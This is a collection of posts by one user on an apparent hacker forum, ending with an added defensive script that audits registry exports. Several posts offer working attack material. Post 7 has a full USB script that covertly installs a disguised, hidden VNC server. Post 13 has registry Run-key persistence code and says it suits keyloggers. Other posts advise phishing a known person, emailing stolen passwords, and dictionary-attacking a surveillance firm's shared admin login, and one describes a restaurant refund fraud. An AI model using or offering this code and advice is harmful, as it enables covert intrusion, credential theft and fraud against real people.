AndyzBong

  1. I've got a couple more pictures to take but I figure that I might as well post my lame.. umm.. mod? http://andyzbong.angelfire.com/index.html I would just post the image but angelfire (yeah.. I know) would replace it with the "this image is hosted by angelfire" bs. Love it or hate it; I will be making a "wITTy" mod as well. If you're thinking of "T"; then you've never been to an ITT campus. - AndyzBong
  2. I know that I am about 10 days late to reply to this post, but http://canyouseeme.org is also a good site to use, other than http://portforward.com
  3. I agree with most that social engineering would be the best way to go about this. Perhaps a fake phishing email sent through an open mail relay server would be your best bet. You know him personally so you know the vulnerabilities in his character.
  4. Yes, just like in Space Rogue's article; you can use Google to view and move (PTZ) cameras. However, you will not be able to stop the recording or disable the surveillance system in any way. Actually, most of these "Google hack" cameras are meant to be viewed over the internet without a login or password; as they are always in "guest mode". You could DDoS the address; but even then, you're not "hacking" (and all recorded video events will still be on the local machine) - AndyzBong
  5. I'm in. And since I have already written an article for Analog5; I'm on the score board. This weekend I will write up another article; but me and Famicoman can't write an entire e-zine ourselves. Writing an article for Analog5 would be a great way to earn points.
  6. Howdy all, I recently was employed as a "Surveillance System Software Support Specialist" for a private video surveillance company here in Pa. Now, we all know that if you aim an infrared laser-pointer at an IR surveillance camera at night, you will completely "white out" the camera; but today I wanted to discuss some of the other vulnerabilities in not only the surveillance cameras, but the PC that runs the surveillance software.

     First off, all of our PCs are running Windows XP and automatically log in to Windows under an administrator account without password verification. The reason I was given for this is so when there is a power outage the computer will automatically reboot when the UPS is out of battery and the power is restored. Good, great, grand, and wonderful... but it doesn't have to be an administrative user. However, I just do what I'm told.

     Secondly, when Windows XP boots the surveillance software runs on startup, logged in under "guest mode". Guest allows you to do nothing (such as Stop Monitoring, exit full screen mode, exit the software, etc). My boss thinks that "When you're logged in as guest, you cannot close the software or make any changes." However, you can run task manager and kill the process. Our software's process is not run under system; it is run under the administrative user.

     Lastly, I do not install the surveillance cameras or run their conduit, but I have learned a lot about how surveillance cameras can pick up interference. A couple of our customers are machine shops (machinist), who want to keep a watchful eye on their carbide supply. The exterior of the building is usually aluminum and the welders like to ground their equipment to the beams of the building. This gives the entire building a negative charge which will go through the metal housing of the cameras and cause interference on the cameras that looks like HBO porn before a descrambler. I asked a camera installer if I put a 9v battery up to the housing of the camera, would it cause the same interference? His response was "I wouldn't doubt it." And our wireless cameras? Worse. Now this is not the same for every video surveillance company, just the companies that cheat their customers and fill up the pockets of the boss. We don't even use shielding for any of the cameras unless there is a cell phone base tower right next door to our customer (or some other equivalent of massive interference).

     One final note, the administrative login to ALL of our customers is "admin" and the administrative password to ALL of our customers is eight characters all lowercase. If you could run a dictionary attack on our software's login page, not only would you be in on one computer, but if you had a copy of our clients' DNS addresses... you'd be admin on them all.

     PS: Since our surveillance systems are PC-based, our customers enjoy monitoring their cameras from home via the internet. If one were to stumble upon their DNS address and reached a login page; one would only have to log in as "guest" with no password in order to view the cameras. Just like Space Rogue's write-up about Google hacking surveillance systems. http://www.spacerogue.net/wordpress/?p=38 - AndyzBong
  7. Howdy all, I always enjoy a new silent VNC server install via the USB switchblade, but I can never get them to work. I downloaded VNCHooks.dll and winvnc.exe (TightVNC Win32 Server) from http://www.tightvnc.com/download (tightvnc-1.3.9_x86.zip) and placed both of these files in my WIPCMDtvnc folder. (WIPCMD is my "payload folder" containing go.cmd and vnc.cmd) My vnc.cmd code looks like this: @echo off REM Silent Install of TightVNC server REM Script by kz26 REM Copy VNC Server Files xcopy tvncwinvnc.exe %systemroot% /c /y xcopy tvncVNCHooks.dll %systemroot% /c /y REM Install fake WinVNC service and import reg settings sc create winvnc binpath= "%systemroot%winvnc.exe -service" type= interact type= own start= auto displayname= "Domain Client Service" sc description winvnc "Manages communication between a Windows Server Domain Controller and a connected Domain Client. If this service is not started or disabled, domain functions will be inoperable." regedit.exe /s tvncreg1.reg regedit.exe /s tvncreg2.reg REM Port: 8080 REM Username: N/A REM Password: hacked net start winvnc :End exit This are my reg1.reg and reg2.reg code(s): reg1.reg Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3DisableTrayIcon DWORD "1"] [HKEY_CURRENT_USERSoftwareORL] [HKEY_CURRENT_USERSoftwareORLVNCHooks] [HKEY_CURRENT_USERSoftwareORLVNCHooksApplication_Prefs] [HKEY_CURRENT_USERSoftwareORLVNCHooksApplication_Prefswinvnc.exe] "use_GetUpdateRect"=dword:00000001 "use_Timer"=dword:00000000 "use_KeyPress"=dword:00000001 "use_LButtonUp"=dword:00000001 "use_MButtonUp"=dword:00000001 "use_RButtonUp"=dword:00000001 "use_Deferral"=dword:00000001 reg2.reg Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREORL] [HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3] "ConnectPriority"=dword:00000000 "DebugMode"=dword:00000000 "DebugLevel"=dword:00000002 "LoopbackOnly"=dword:00000000 "EnableHTTPDaemon"=dword:00000000 "EnableURLParams"=dword:00000000 "AllowLoopback"=dword:00000001 
"AuthRequired"=dword:00000001 [HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default] "QuerySetting"=dword:00000002 "QueryTimeout"=dword:0000001e "QueryAccept"=dword:00000000 "QueryAllowNoPass"=dword:00000000 "SocketConnect"=dword:00000001 "AutoPortSelect"=dword:00000000 "PortNumber"=dword:00001f90 "HTTPPortNumber"=dword:000016a8 "InputsEnabled"=dword:00000001 "LocalInputsDisabled"=dword:00000000 "IdleTimeout"=dword:00000000 "LockSetting"=dword:00000000 "RemoveWallpaper"=dword:00000001 "Password"=hex:77,96,ba,8c,c2,b3,68,07 "PasswordViewOnly"=hex:77,96,ba,8c,c2,b3,68,07 "PollUnderCursor"=dword:00000000 "PollForeground"=dword:00000001 "PollFullScreen"=dword:00000000 "OnlyPollConsole"=dword:00000001 "OnlyPollOnEvent"=dword:00000000 and finally, this is my go.cmd code that launches vnc.cmd: @echo [START Silent WinVNC Server Install] >> Documentslogfiles%computername%.log 2>&1 start /b .vnc.cmd @echo [End Silent WinVNC Server Install] >> Documentslogfiles%computername%.log 2>&1 :End exit This code is the last script to be autorun by my USB Switchblade; when it executes, the rest of my applications (FirePassword, netpass, iehv, etc) all work fine. Note: I added [HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3DisableTrayIcon DWORD "1"] to the reg1.reg file due to HALEN666's comment about this registry key disabling the WinVNC server icon from the system tray; but can't the same means be achieved by ResHacking winvnc.exe and replacing the WinVNC icon with a clear icon? - AndyzBong
  8. Hello all, Recently a friend of mine at ITT who works at McDonalds informed me of an interesting trick. This little "hack" allows you to get an additional Double-Quarter Pounder burger at McDonalds. You should really do this with two separate people on two separate orders. Step 1: Order a regular Quarter Pounder burger and a Double Quarter Pounder burger. (add other items if you wish to disguise the "hack") Step 2: Upon receiving your food, place your Quarter Pounder burger in the Double Quarter Pounder box and hide the double Quarter Pounder. Step 3: Tell cashier that there has been a mistake and you have received a regular Quarter Pounder instead of a double. (both the double and single sandwich come in the same "Quarter Pounder" box) Step 4: Receive another double Quarter Pounder in replacement of your single Quarter Pounder. You now have two double Quarter Pounder McDonald burgers. Enjoy, AndyzBong (information provided by Paul "Wall" P.)
  9. One of the more creative uses of the USB Switchblade is the Folding@Home capability. I once read an article about a software programmer who just happened to have SETI@Home installed on his wife's laptop that was stolen. Long story short, when the thieves logged into the internet with the stolen laptop and the screen-saver was activated, SETI went into effect. The laptop automatically logged itself into the SETI@Home account and displayed its new IP. The ISP was contacted, records were seized, thieves got arrested, the laptop got returned. I do not know why you would go through all this trouble for (what should be) a 512mb flash-drive. If you are worried about a lost Switchblade and revenge is your primary concern; I would set the payload to e-mail you (a junk Yahoo account) the captured logs/passwords (as well as store them on the USB). It may not be stealthy, but I hope it helped. Here's the SETI article: http://www.virtuallystrange.net/ufo/update...b/m15-005.shtml
  10. Kimberly might not be too happy to find out that her full name and work email are so public. Very nice find secret52.
  11. I have heard of such "EXE Binders" being used to combine animated greeting-card software and trojan horse servers. Wikipedia "File Binder". As far as a *.jpeg file being bound with an *.exe ... I do have to admit; I have downloaded such a program. Anti-Virus caught it and I decided not to test it out. DLL Injections are cooler anyways. - AndyzBong
  12. Enlightened about the quotations, gotta read my Windows CL book more.... I knew the /y was supposed to go in there somewhere. Thanks GonZor; this is why I am a Hackling and you are a Zombie.
  13. So I've been messing around lately with a couple of home-brew payload additions for my USB Switchblade and I decided that I wanted one of my particular payloads to be dumped in my "victims" Startup folder (for execution upon the next reboot). Note: My payload addition is just a harmless prank for a friend of mine. All the program does is continually loop vbCritical MsgBoxs that say "Your system is critically running low on virtual memory!". Hence the program is named VirtuMem.exe It all seemed simple enough right? copy H:WIPCMDVirtuMem.exe C:Documents and SettingsAll UsersStart MenuProgramsStartup Nope! Incorrect syntax. So I tried copy H:WIPCMDVirtuMem.exe C: and... tada! Either my syntax is wrong (please feel free to enlighten me) or I had to find another solution around this. Anywho, if you are familiar with SysInternal's freeware program called AutoRuns; then you know that applications such as AIM, QuickTime, Symantec, and other software-vendors can autorun their applications upon login without having a .LNK file in the Startup folder. My solution to the problem was merely to copy a version of VirtuMem into my WIPCMD folder and create a *.reg file (named startup.reg) like so: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] "VirtuMem"="C:WINDOWSSYSTEM32VirtuMem.exe" and then add the following code to my go.cmd file: @echo [START AutoRun VirtuMem via RegEdit] >> Documentslogfiles%computername%.log 2>&1 echo. >> Documentslogfiles%computername%.log 2>&1 copy H:WIPCMDVirtuMem.exe C:WINDOWSSYSTEM32 regedit.exe /s WIPCMDstartup.reg echo. >> Documentslogfiles%computername%.log 2>&1 @echo [END AutoRun VirtuMem via RegEdit] >> Documentslogfiles%computername%.log 2>&1 I just figure it was a neat trick that I would share with the community. This would work well for keyloggers or any other applications that you may want to run at startup, without keeping the file in the Startup folder. 
This also could be used for non-malicious purposes... I can clearly see the teenage computer network lab technician who hates the WeatherBug's autorun on all the campus lab computers due to AOL Instant Messenger (and deleting the registry values instead of importing them). Final Note: I have not yet tried this on my "friend". I am not responsible for you screwing up your Windows Registry and not making backups of your vast pr0n collection or your Windows Registry. I will let you know how the results go, but so far; this code is untested. In conclusion, if you have a different way around Startup, or if my syntax is completely wrong, or if I am completely wrong, or if you've liked this minor piece of info; let me know. This code is for Windows XP Pro (as far as I know). Peace. - AndyzBong
  14. Try Googling "Hexing Your Malware" (without the quotations). This was a suggestion that I read off a post in the old forums. The first link from GovernmentSecurity.org is a forum post with horrible spelling mistakes. I deciphered the instructions, downloaded Hex Workshop, tested, failed, retested, failed, re-retested, failed. (You get the idea?) So I do not suggest that particular article, but there are about 297,000 results so have fun experimenting.... oh.. and deciphering. - AndyzBong
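
Added example, not part of the original posts: a defender-side audit of a registry export for the two artifacts described in posts 7 and 13, namely an unapproved value under the HKLM `Run` key and WinVNC server settings under `ORL\WinVNC3`. The sample export text is constructed, and the allowlist and function names are hypothetical.

```python
import re

RUN_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
VNC_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3"

# Constructed sample: text of a registry export (not taken from a real host).
SAMPLE_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"QuickTime Task"="\"C:\\Program Files\\QuickTime\\qttask.exe\" -atboottime"
"VirtuMem"="C:\\WINDOWS\\SYSTEM32\\VirtuMem.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
"PortNumber"=dword:00001f90
'''

# Hypothetical allowlist of Run-key value names approved for this build.
APPROVED_RUN_VALUES = {"QuickTime Task"}

def parse_reg(text):
    """Parse .reg export text into {key_path: {value_name: raw_data}}."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = keys.setdefault(line[1:-1], {})
        elif current is not None:
            m = re.match(r'"((?:[^"\\]|\\.)*)"=(.*)$', line)
            if m:
                current[m.group(1)] = m.group(2)
    return keys

def audit(text, approved=APPROVED_RUN_VALUES):
    """Return findings: unapproved Run entries and VNC server settings."""
    findings = []
    for path, values in parse_reg(text).items():
        if path.upper() == RUN_KEY.upper():
            for name, data in values.items():
                if name not in approved:
                    findings.append(("unapproved-autorun", name, data))
        elif path.upper().startswith(VNC_KEY.upper()):
            port = values.get("PortNumber", "")
            if port.startswith("dword:"):
                findings.append(("vnc-server-config", path, int(port[6:], 16)))
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_EXPORT):
        print(finding)
```

Autostart entries created this way never appear in the Startup folder, so the comparison has to be made against the registry itself, with the allowlist taken from a known-good build.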